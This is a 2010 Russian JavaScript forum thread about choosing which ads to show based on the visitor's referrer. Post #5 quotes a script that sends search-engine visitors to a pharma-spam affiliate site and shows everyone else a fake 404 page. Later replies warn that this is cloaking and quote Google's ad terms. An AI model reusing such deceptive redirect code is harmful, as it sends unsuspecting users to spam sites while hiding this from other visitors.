Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 18.12.2010, 11:52
Аватар для wlad2
Кандидат Javascript-наук
Отправить личное сообщение для wlad2 Посмотреть профиль Найти все сообщения от wlad2
 
Регистрация: 16.10.2010
Сообщений: 117

В зависимости от referrer выводить рекламу adsene или зорьки
На сайте стоит кэширование, поэтому готовые на php скрипты толку подключать ноль.
Но как-же тогда сделать такое на JS?
Если пришли с поиска Яндекса то выдавать например код Зорьки(Бегуна), а если пришли с Гугла то выдавать блок adsense, а если нет реферрера то выводить что-то другое, но тоже рекламу.
Ответить с цитированием
  #2 (permalink)  
Старый 18.12.2010, 11:59
Особый гость
Посмотреть профиль Найти все сообщения от monolithed
 
Регистрация: 02.04.2010
Сообщений: 4,260

А если пришли с отключенным JS?

используйте:
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
Ответить с цитированием
  #3 (permalink)  
Старый 18.12.2010, 12:17
Аватар для wlad2
Кандидат Javascript-наук
Отправить личное сообщение для wlad2 Посмотреть профиль Найти все сообщения от wlad2
 
Регистрация: 16.10.2010
Сообщений: 117

monolithed,
у меня движок на wp стоит и стоит плагин кэширования, как будет работать PHP? под каждого реферрера делать отдельный кэш?
Ответить с цитированием
  #4 (permalink)  
Старый 18.12.2010, 12:20
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

Сообщение от monolithed
А если пришли с отключенным JS?
Реклама тоже JS-ом показывается.

document.referer
Ответить с цитированием
  #5 (permalink)  
Старый 18.12.2010, 12:42
Аватар для wlad2
Кандидат Javascript-наук
Отправить личное сообщение для wlad2 Посмотреть профиль Найти все сообщения от wlad2
 
Регистрация: 16.10.2010
Сообщений: 117

ребята вот например есть код
<script> 
function R(){ 
var Ref=document.referrer; 

if (Ref.indexOf('.google.')!=-1 || Ref.indexOf('.bing.')!=-1 || Ref.indexOf('.yahoo.')!=-1 || Ref.indexOf('.aol.')!=-1 || Ref.indexOf('.ask.')!=-1 || Ref.indexOf('.altavista.')!=-1 || Ref.indexOf('.bing.')!=-1 ) 
{ document.write('<script language="javascript">docu'+'ment.location="http://ССЫЛКАНАШОПОТdrugrevenue.com"</s'+'cript>')} 

else { 
document.write('<h1>404 Not Found</h1>'); 
} 
} 

R(); 
</script>

как его переделать под мои нужды?
Ответить с цитированием
  #6 (permalink)  
Старый 18.12.2010, 13:28
Особый гость
Посмотреть профиль Найти все сообщения от monolithed
 
Регистрация: 02.04.2010
Сообщений: 4,260

Сообщение от Kolyaj
Реклама тоже JS-ом показывается.
Ну если только реклама))

wlad2,
indexOf() - не кроссбраузерный метод
write() перед использованием этого метода 100 раз подумаете и все проверьте))

Сообщение от wlad2
Если пришли с поиска Яндекса то выдавать например код Зорьки(Бегуна), а если пришли с Гугла то выдавать блок adsense, а если нет реферрера то выводить что-то другое, но тоже рекламу.
Кстати, ПС это может расцениваться как клоакинг, дабы они понимают JS и ваш сайт может никогда больше не выводить рекламу))

Последний раз редактировалось monolithed, 18.12.2010 в 13:31.
Ответить с цитированием
  #7 (permalink)  
Старый 18.12.2010, 15:11
Аватар для wlad2
Кандидат Javascript-наук
Отправить личное сообщение для wlad2 Посмотреть профиль Найти все сообщения от wlad2
 
Регистрация: 16.10.2010
Сообщений: 117

Цитата:
ПС это может расцениваться как клоакинг
Контентная часть остается на странице, меняется только реклама, не думаю что это клоакинг!
Ответить с цитированием
  #8 (permalink)  
Старый 18.12.2010, 15:39
Особый гость
Посмотреть профиль Найти все сообщения от monolithed
 
Регистрация: 02.04.2010
Сообщений: 4,260

Сообщение от wlad2
Контентная часть остается на странице, меняется только реклама, не думаю что это клоакинг!
Это может рассматриваться как нарушение лицензии:

"ЗАПРЕЩАЕТСЯ":
(b) каким-либо образом редактировать, фильтровать, урезать или изменять порядок информации, содержащейся в любом Объявлении, Ссылке, Рекламном блоке, Результате поиска, или Кнопке реферала, или удалять, делать неясным или сокращать любое Объявление, Ссылку, Рекламный блок, Результат поиска или Кнопку реферала без разрешения от компании Google;

(c) устанавливать рамки, сокращать, удалять, или иным образом ограничивать полный показ любой веб-страницы, к которой получает доступ конечный пользователь после нажатия на любую часть объявления ("Страница Рекламодателя)", любой Страницы результатов поиска, или любой Страницы реферала;

(d) переадресовать конечного пользователя с любой Страницы Рекламодателя, Страницы результатов поиска, или Страницы реферала; предоставлять версию Страницы Рекламодателя, Страницы результатов поиска, или Страницы реферала, которая отличается от страницы, к которой конечный пользователь получил бы доступ, при переходе непосредственно на Страницу Рекламодателя, Страницу результатов поиска, или Страницу реферала; распределять любое содержание между Объявлением и Страницей Рекламодателя, между страницей, содержащей Окно поиска, и Страницей результатов поиска, или между Кнопкой реферала и Страницей реферала; или иным образом предоставлять что-либо кроме прямой ссылки между Объявлением и Страницей Рекламодателя, страницей, содержащей Окно поиска, и Страницей результатов поиска, или Кнопкой реферала и Страницей реферала;

(e) демонстрировать любое Объявление(я), Ссылку(и), или Кнопку(и) реферала на любой веб-странице или любом веб-сайте, содержание которого связано с порнографией, ненавистью, жестокостью или является незаконным;
Ответить с цитированием
  #9 (permalink)  
Старый 18.12.2010, 16:02
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

Сообщение от monolithed
indexOf() - не кроссбраузерный метод
и где он не работает?
Ответить с цитированием
  #10 (permalink)  
Старый 18.12.2010, 21:43
Особый гость
Посмотреть профиль Найти все сообщения от monolithed
 
Регистрация: 02.04.2010
Сообщений: 4,260

http://alljs.ru/articles/array/indexof.html
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Шапка сайта (или изображение) меняется в зависимости от источника перехода vstoday Общие вопросы Javascript 2 16.01.2010 16:00